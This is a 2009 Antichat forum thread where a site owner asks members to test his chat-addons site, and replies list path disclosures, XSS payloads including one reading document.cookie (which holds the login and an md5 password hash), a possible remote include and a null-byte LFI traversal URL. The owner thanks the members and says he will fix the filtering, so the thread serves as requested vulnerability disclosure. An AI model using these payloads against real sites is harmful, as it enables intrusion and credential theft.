ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
Перезагрузить страницу http://addons.august4u.eu
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

http://addons.august4u.eu
  #1  
Старый 02.07.2009, 03:25
Аватар для Большой джо
Большой джо
Познающий
Регистрация: 28.06.2009
Сообщений: 56
Провел на форуме:
175879

Репутация: 3
По умолчанию http://addons.august4u.eu
Все привет, вот открыл сервис дополнений к август4у чатам, и надо проверить сайт на уязвимости, прошу протестить сайт пожалста!!!!
Последний раз редактировалось Большой джо; 02.07.2009 в 16:48..
 
Ответить с цитированием

  #2  
Старый 02.07.2009, 18:44
Аватар для Adm1n4eG
Adm1n4eG
Познающий
Регистрация: 27.03.2009
Сообщений: 40
Провел на форуме:
1191962

Репутация: 39
По умолчанию
раскрытие путей:

http://addons.august4u.eu/top/top.php?id=11

Цитата:
Warning: imagecreatefromjpeg(img/logo.jpg) [function.imagecreatefromjpeg]: failed to open stream: No such file or directory in /var/www/[скрыто]/top/top.php on line 35
http://addons.august4u.eu/come.php?comanda=delfriend&idfriend=999999999999

Цитата:
Warning: fopen(datamsg/id999999999999/friend.dat) [function.fopen]: failed to open stream: No such file or directory in /var/www/[скрыто]/come.php on line 492
http://addons.august4u.eu/come.php?comanda=addfriend&idfriend=999999999999

Цитата:
Warning: fopen(datamsg/id999999999999/black.dat) [function.fopen]: failed to open stream: No such file or directory in /var/www/[скрыто]/come.php on line 424
тут сохраняются файлкеки правда пустые....
http://addons.august4u.eu/datamsg/id1/friend.dat
http://addons.august4u.eu/datamsg/id1/black.dat


теперь XSS (обязательно залогинеца нада):

делаем такой запрос:
http://addons.august4u.eu/come.php?comanda=addfriend&idfriend=999999"><scrip t>alert(document.cookie)</script>999999

и тут смотрим результат:
http://addons.august4u.eu/index.php?comanda=friends

в куках логин и пасс(md5)...
Последний раз редактировалось Adm1n4eG; 02.07.2009 в 19:31..
 
Ответить с цитированием

  #3  
Старый 02.07.2009, 19:31
Аватар для AKYLA
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596

Репутация: 88
По умолчанию
XSS и раскрытие путей тех же.
Цитата:
http://addons.august4u.eu/index.php?comanda=viemfoto&files=1>"><ScRiPt%20%0a
%0d>alert(12345)%3B</ScRiPt>
По идее инклюд, но не крутил на предмет реального выполнения.
Цитата:
http://addons.august4u.eu/index.php?comanda=viemfoto&files=http://www.admin.com
 
Ответить с цитированием

  #4  
Старый 02.07.2009, 21:54
Аватар для eLWAux
eLWAux
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию
LFI
http://addons.august4u.eu/index.php?comanda=viemfoto&files=../{FILE}%00

сайт в дирах. где не подставлю ковычку - ошибка.
 
Ответить с цитированием

  #5  
Старый 02.07.2009, 22:08
Аватар для Большой джо
Большой джо
Познающий
Регистрация: 28.06.2009
Сообщений: 56
Провел на форуме:
175879

Репутация: 3
По умолчанию
всем за участие спс, буду переписывать фильтр, и делать более строгую проверку данных))
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ